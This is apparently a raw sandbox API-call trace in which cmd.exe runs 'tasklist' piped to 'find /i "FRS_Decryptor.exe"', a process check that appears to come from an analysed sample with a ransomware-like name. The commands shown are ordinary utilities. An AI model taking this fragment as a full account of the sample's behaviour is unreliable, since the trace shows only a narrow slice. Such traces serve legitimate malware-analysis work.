[0078.022] _wcsicmp (_String1="tasklist", _String2="KEYS") returned 9 [0078.022] _wcsicmp (_String1="tasklist", _String2="MOVE") returned 7 [0078.022] _wcsicmp (_String1="tasklist", _String2="PUSHD") returned 4 [0078.022] _wcsicmp (_String1="tasklist", _String2="POPD") returned 4 [0078.022] _wcsicmp (_String1="tasklist", _String2="ASSOC") returned 19 [0078.022] _wcsicmp (_String1="tasklist", _String2="FTYPE") returned 14 [0078.022] _wcsicmp (_String1="tasklist", _String2="BREAK") returned 18 [0078.022] _wcsicmp (_String1="tasklist", _String2="COLOR") returned 17 [0078.022] _wcsicmp (_String1="tasklist", _String2="MKLINK") returned 7 [0078.022] _wcsicmp (_String1="tasklist", _String2="FOR") returned 14 [0078.022] _wcsicmp (_String1="tasklist", _String2="IF") returned 11 [0078.022] _wcsicmp (_String1="tasklist", _String2="REM") returned 2 [0078.022] _wcsicmp (_String1="tasklist", _String2="DIR") returned 16 [0078.022] _wcsicmp (_String1="tasklist", _String2="ERASE") returned 15 [0078.022] _wcsicmp (_String1="tasklist", _String2="DEL") returned 16 [0078.022] _wcsicmp (_String1="tasklist", _String2="TYPE") returned -24 [0078.022] _wcsicmp (_String1="tasklist", _String2="COPY") returned 17 [0078.022] _wcsicmp (_String1="tasklist", _String2="CD") returned 17 [0078.022] _wcsicmp (_String1="tasklist", _String2="CHDIR") returned 17 [0078.022] _wcsicmp (_String1="tasklist", _String2="RENAME") returned 2 [0078.022] _wcsicmp (_String1="tasklist", _String2="REN") returned 2 [0078.023] _wcsicmp (_String1="tasklist", _String2="ECHO") returned 15 [0078.023] _wcsicmp (_String1="tasklist", _String2="SET") returned 1 [0078.023] _wcsicmp (_String1="tasklist", _String2="PAUSE") returned 4 [0078.023] _wcsicmp (_String1="tasklist", _String2="DATE") returned 16 [0078.023] _wcsicmp (_String1="tasklist", _String2="TIME") returned -8 [0078.023] _wcsicmp (_String1="tasklist", _String2="PROMPT") returned 4 [0078.023] _wcsicmp (_String1="tasklist", _String2="MD") returned 7 [0078.023] _wcsicmp (_String1="tasklist", _String2="MKDIR") returned 7 [0078.023] _wcsicmp (_String1="tasklist", _String2="RD") returned 2 [0078.023] _wcsicmp (_String1="tasklist", _String2="RMDIR") returned 2 [0078.023] _wcsicmp (_String1="tasklist", _String2="PATH") returned 4 [0078.023] _wcsicmp (_String1="tasklist", _String2="GOTO") returned 13 [0078.023] _wcsicmp (_String1="tasklist", _String2="SHIFT") returned 1 [0078.023] _wcsicmp (_String1="tasklist", _String2="CLS") returned 17 [0078.023] _wcsicmp (_String1="tasklist", _String2="CALL") returned 17 [0078.023] _wcsicmp (_String1="tasklist", _String2="VERIFY") returned -2 [0078.023] _wcsicmp (_String1="tasklist", _String2="VER") returned -2 [0078.023] _wcsicmp (_String1="tasklist", _String2="VOL") returned -2 [0078.023] _wcsicmp (_String1="tasklist", _String2="EXIT") returned 15 [0078.023] _wcsicmp (_String1="tasklist", _String2="SETLOCAL") returned 1 [0078.023] _wcsicmp (_String1="tasklist", _String2="ENDLOCAL") returned 15 [0078.023] _wcsicmp (_String1="tasklist", _String2="TITLE") returned -8 [0078.023] _wcsicmp (_String1="tasklist", _String2="START") returned 1 [0078.023] _wcsicmp (_String1="tasklist", _String2="DPATH") returned 16 [0078.023] _wcsicmp (_String1="tasklist", _String2="KEYS") returned 9 [0078.023] _wcsicmp (_String1="tasklist", _String2="MOVE") returned 7 [0078.023] _wcsicmp (_String1="tasklist", _String2="PUSHD") returned 4 [0078.023] _wcsicmp (_String1="tasklist", _String2="POPD") returned 4 [0078.023] _wcsicmp (_String1="tasklist", _String2="ASSOC") returned 19 [0078.023] _wcsicmp (_String1="tasklist", _String2="FTYPE") returned 14 [0078.023] _wcsicmp (_String1="tasklist", _String2="BREAK") returned 18 [0078.023] _wcsicmp (_String1="tasklist", _String2="COLOR") returned 17 [0078.023] _wcsicmp (_String1="tasklist", _String2="MKLINK") returned 7 [0078.023] _wcsnicmp (_String1="task", _String2="cmd ", _MaxCount=0x4) returned 17 [0078.023] SetErrorMode (uMode=0x0) returned 0x0 [0078.023] SetErrorMode (uMode=0x1) returned 0x0 [0078.023] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x1475228, lpFilePart=0xf2f604 | out: lpBuffer="C:\\Users\\5JgHKoaOfdp\\Desktop", lpFilePart=0xf2f604*="Desktop") returned 0x1c [0078.023] SetErrorMode (uMode=0x0) returned 0x1 [0078.024] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0078.024] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0078.027] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0078.028] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0078.028] FindFirstFileExW (in: lpFileName="C:\\Users\\5JgHKoaOfdp\\Desktop\\tasklist.*", fInfoLevelId=0x1, lpFindFileData=0xf2f390, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xf2f390) returned 0xffffffff [0078.028] GetLastError () returned 0x2 [0078.028] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0078.028] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\tasklist.*", fInfoLevelId=0x1, lpFindFileData=0xf2f390, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xf2f390) returned 0x1475530 [0078.028] FindClose (in: hFindFile=0x1475530 | out: hFindFile=0x1475530) returned 1 [0078.028] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\tasklist.COM", fInfoLevelId=0x1, lpFindFileData=0xf2f390, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xf2f390) returned 0xffffffff [0078.029] GetLastError () returned 0x2 [0078.029] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\tasklist.EXE", fInfoLevelId=0x1, lpFindFileData=0xf2f390, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xf2f390) returned 0x1475530 [0078.029] FindClose (in: hFindFile=0x1475530 | out: hFindFile=0x1475530) returned 1 [0078.029] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0078.029] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0078.029] _wcsnicmp (_String1="task", _String2="cmd ", _MaxCount=0x4) returned 17 [0078.029] SetErrorMode (uMode=0x0) returned 0x0 [0078.029] SetErrorMode (uMode=0x1) returned 0x0 [0078.029] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x147a3c0, lpFilePart=0xf2f3ac | out: lpBuffer="C:\\Users\\5JgHKoaOfdp\\Desktop", lpFilePart=0xf2f3ac*="Desktop") returned 0x1c [0078.029] SetErrorMode (uMode=0x0) returned 0x1 [0078.029] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0078.029] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0078.029] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0078.029] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0078.029] FindFirstFileExW (in: lpFileName="C:\\Users\\5JgHKoaOfdp\\Desktop\\tasklist.*", fInfoLevelId=0x1, lpFindFileData=0xf2f138, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xf2f138) returned 0xffffffff [0078.029] GetLastError () returned 0x2 [0078.029] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0078.030] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\tasklist.*", fInfoLevelId=0x1, lpFindFileData=0xf2f138, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xf2f138) returned 0x1475628 [0078.030] FindClose (in: hFindFile=0x1475628 | out: hFindFile=0x1475628) returned 1 [0078.030] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\tasklist.COM", fInfoLevelId=0x1, lpFindFileData=0xf2f138, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xf2f138) returned 0xffffffff [0078.030] GetLastError () returned 0x2 [0078.030] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\tasklist.EXE", fInfoLevelId=0x1, lpFindFileData=0xf2f138, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xf2f138) returned 0x1475628 [0078.030] FindClose (in: hFindFile=0x1475628 | out: hFindFile=0x1475628) returned 1 [0078.030] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0078.030] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0078.030] GetConsoleTitleW (in: lpConsoleTitle=0xf2f634, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\SYSTEM32\\cmd.exe") returned 0x1b [0078.031] InitializeProcThreadAttributeList (in: lpAttributeList=0xf2f560, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0xf2f544 | out: lpAttributeList=0xf2f560, lpSize=0xf2f544) returned 1 [0078.031] UpdateProcThreadAttribute (in: lpAttributeList=0xf2f560, dwFlags=0x0, Attribute=0x60001, lpValue=0xf2f54c, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0xf2f560, lpPreviousValue=0x0) returned 1 [0078.031] GetStartupInfoW (in: lpStartupInfo=0xf2f598 | out: lpStartupInfo=0xf2f598*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x24, hStdOutput=0x254, hStdError=0x2c)) [0078.031] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0078.031] _wcsnicmp (_String1="COPYCMD", _String2="=ExitCo", _MaxCount=0x7) returned 38 [0078.031] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0078.031] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0078.031] _wcsnicmp (_String1="COPYCMD", _String2="cmdln=", _MaxCount=0x7) returned 2 [0078.031] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0078.031] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0078.031] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0078.031] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0078.031] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0078.031] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0078.031] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0078.031] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0078.031] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0078.031] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0078.031] _wcsnicmp (_String1="COPYCMD", _String2="MYFILES", _MaxCount=0x7) returned -10 [0078.031] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0078.031] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0078.031] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0078.031] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0078.031] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0078.031] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0078.031] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0078.031] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0078.031] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0078.031] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0078.031] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0078.031] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0078.031] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0078.031] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0078.031] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0078.031] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0078.031] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0078.031] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0078.031] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0078.031] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0078.031] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0078.031] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0078.031] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0078.031] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0078.031] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0078.032] lstrcmpW (lpString1="\\tasklist.exe", lpString2="\\XCOPY.EXE") returned -1 [0078.033] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\tasklist.exe", lpCommandLine="tasklist", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5JgHKoaOfdp\\Desktop", lpStartupInfo=0xf2f4e8*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="tasklist", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0xf2f534 | out: lpCommandLine="tasklist", lpProcessInformation=0xf2f534*(hProcess=0x64, hThread=0x60, dwProcessId=0xb60, dwThreadId=0xb6c)) returned 1 [0078.036] CloseHandle (hObject=0x60) returned 1 [0078.036] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0078.036] GetEnvironmentStringsW () returned 0x14742d8* [0078.036] FreeEnvironmentStringsA (penv="=") returned 1 [0078.036] DeleteProcThreadAttributeList (in: lpAttributeList=0xf2f560 | out: lpAttributeList=0xf2f560) [0078.036] _get_osfhandle (_FileHandle=3) returned 0x54 [0078.036] DuplicateHandle (in: hSourceProcessHandle=0x64, hSourceHandle=0x54, hTargetProcessHandle=0x0, lpTargetHandle=0x0, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x1 | out: lpTargetHandle=0x0) returned 1 [0078.036] _dup2 (_FileHandleSrc=5, _FileHandleDst=1) returned 0 [0078.036] _close (_FileHandle=5) returned 0 [0078.036] _dup (_FileHandle=0) returned 4 [0078.036] _dup2 (_FileHandleSrc=3, _FileHandleDst=0) returned 0 [0078.036] _close (_FileHandle=3) returned 0 [0078.036] _wcsnicmp (_String1="find", _String2="cmd ", _MaxCount=0x4) returned 3 [0078.036] SetErrorMode (uMode=0x0) returned 0x0 [0078.036] SetErrorMode (uMode=0x1) returned 0x0 [0078.037] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x14742e0, lpFilePart=0xf2f604 | out: lpBuffer="C:\\Users\\5JgHKoaOfdp\\Desktop", lpFilePart=0xf2f604*="Desktop") returned 0x1c [0078.037] SetErrorMode (uMode=0x0) returned 0x1 [0078.037] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0078.037] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0078.037] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0078.037] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0078.037] FindFirstFileExW (in: lpFileName="C:\\Users\\5JgHKoaOfdp\\Desktop\\find.*", fInfoLevelId=0x1, lpFindFileData=0xf2f390, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xf2f390) returned 0xffffffff [0078.037] GetLastError () returned 0x2 [0078.037] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0078.037] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\find.*", fInfoLevelId=0x1, lpFindFileData=0xf2f390, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xf2f390) returned 0x1475628 [0078.037] FindClose (in: hFindFile=0x1475628 | out: hFindFile=0x1475628) returned 1 [0078.037] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\find.COM", fInfoLevelId=0x1, lpFindFileData=0xf2f390, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xf2f390) returned 0xffffffff [0078.037] GetLastError () returned 0x2 [0078.037] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\find.EXE", fInfoLevelId=0x1, lpFindFileData=0xf2f390, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xf2f390) returned 0x1475628 [0078.037] FindClose (in: hFindFile=0x1475628 | out: hFindFile=0x1475628) returned 1 [0078.037] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0078.038] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0078.038] _wcsnicmp (_String1="find", _String2="cmd ", _MaxCount=0x4) returned 3 [0078.038] SetErrorMode (uMode=0x0) returned 0x0 [0078.038] SetErrorMode (uMode=0x1) returned 0x0 [0078.038] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x1474668, lpFilePart=0xf2f3ac | out: lpBuffer="C:\\Users\\5JgHKoaOfdp\\Desktop", lpFilePart=0xf2f3ac*="Desktop") returned 0x1c [0078.038] SetErrorMode (uMode=0x0) returned 0x1 [0078.038] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0078.038] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0078.038] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0078.038] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0078.038] FindFirstFileExW (in: lpFileName="C:\\Users\\5JgHKoaOfdp\\Desktop\\find.*", fInfoLevelId=0x1, lpFindFileData=0xf2f138, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xf2f138) returned 0xffffffff [0078.038] GetLastError () returned 0x2 [0078.038] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0078.038] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\find.*", fInfoLevelId=0x1, lpFindFileData=0xf2f138, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xf2f138) returned 0x14704a0 [0078.039] FindClose (in: hFindFile=0x14704a0 | out: hFindFile=0x14704a0) returned 1 [0078.039] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\find.COM", fInfoLevelId=0x1, lpFindFileData=0xf2f138, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xf2f138) returned 0xffffffff [0078.039] GetLastError () returned 0x2 [0078.039] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\find.EXE", fInfoLevelId=0x1, lpFindFileData=0xf2f138, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xf2f138) returned 0x14704a0 [0078.039] FindClose (in: hFindFile=0x14704a0 | out: hFindFile=0x14704a0) returned 1 [0078.039] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0078.039] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0078.039] GetConsoleTitleW (in: lpConsoleTitle=0xf2f634, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\SYSTEM32\\cmd.exe") returned 0x1b [0078.040] InitializeProcThreadAttributeList (in: lpAttributeList=0xf2f560, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0xf2f544 | out: lpAttributeList=0xf2f560, lpSize=0xf2f544) returned 1 [0078.040] UpdateProcThreadAttribute (in: lpAttributeList=0xf2f560, dwFlags=0x0, Attribute=0x60001, lpValue=0xf2f54c, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0xf2f560, lpPreviousValue=0x0) returned 1 [0078.040] GetStartupInfoW (in: lpStartupInfo=0xf2f598 | out: lpStartupInfo=0xf2f598*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x24, hStdOutput=0x254, hStdError=0x2c)) [0078.040] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0078.040] _wcsnicmp (_String1="COPYCMD", _String2="=ExitCo", _MaxCount=0x7) returned 38 [0078.040] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0078.040] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0078.040] _wcsnicmp (_String1="COPYCMD", _String2="cmdln=", _MaxCount=0x7) returned 2 [0078.040] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0078.040] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0078.040] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0078.040] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0078.040] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0078.040] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0078.040] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0078.040] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0078.040] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0078.040] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0078.040] _wcsnicmp (_String1="COPYCMD", _String2="MYFILES", _MaxCount=0x7) returned -10 [0078.040] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0078.040] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0078.040] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0078.040] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0078.040] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0078.040] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0078.040] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0078.040] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0078.040] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0078.040] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0078.040] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0078.040] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0078.040] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0078.040] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0078.041] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0078.041] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0078.041] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0078.041] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0078.041] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0078.041] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0078.041] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0078.041] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0078.041] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0078.041] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0078.041] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0078.041] lstrcmpW (lpString1="\\find.exe", lpString2="\\XCOPY.EXE") returned -1 [0078.041] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\find.exe", lpCommandLine="find /i \"FRS_Decryptor.exe\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5JgHKoaOfdp\\Desktop", lpStartupInfo=0xf2f4e8*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="find /i \"FRS_Decryptor.exe\"", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0xf2f534 | out: lpCommandLine="find /i \"FRS_Decryptor.exe\"", lpProcessInformation=0xf2f534*(hProcess=0x60, hThread=0x54, dwProcessId=0xb68, dwThreadId=0xb74)) returned 1 [0078.043] CloseHandle (hObject=0x54) returned 1 [0078.043] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0078.043] GetEnvironmentStringsW () returned 0x147ad78* [0078.043] FreeEnvironmentStringsA (penv="=") returned 1 [0078.043] DeleteProcThreadAttributeList (in: lpAttributeList=0xf2f560 | out: lpAttributeList=0xf2f560) [0078.043] _dup2 (_FileHandleSrc=4, _FileHandleDst=0) returned 0 [0078.043] _close (_FileHandle=4) returned 0 [0078.043] WaitForSingleObject (hHandle=0x64, dwMilliseconds=0xffffffff) returned 0x0 [0078.531] GetExitCodeProcess (in: hProcess=0x64, lpExitCode=0xf2f8a8 | out: lpExitCode=0xf2f8a8*=0x0) returned 1 [0078.531] 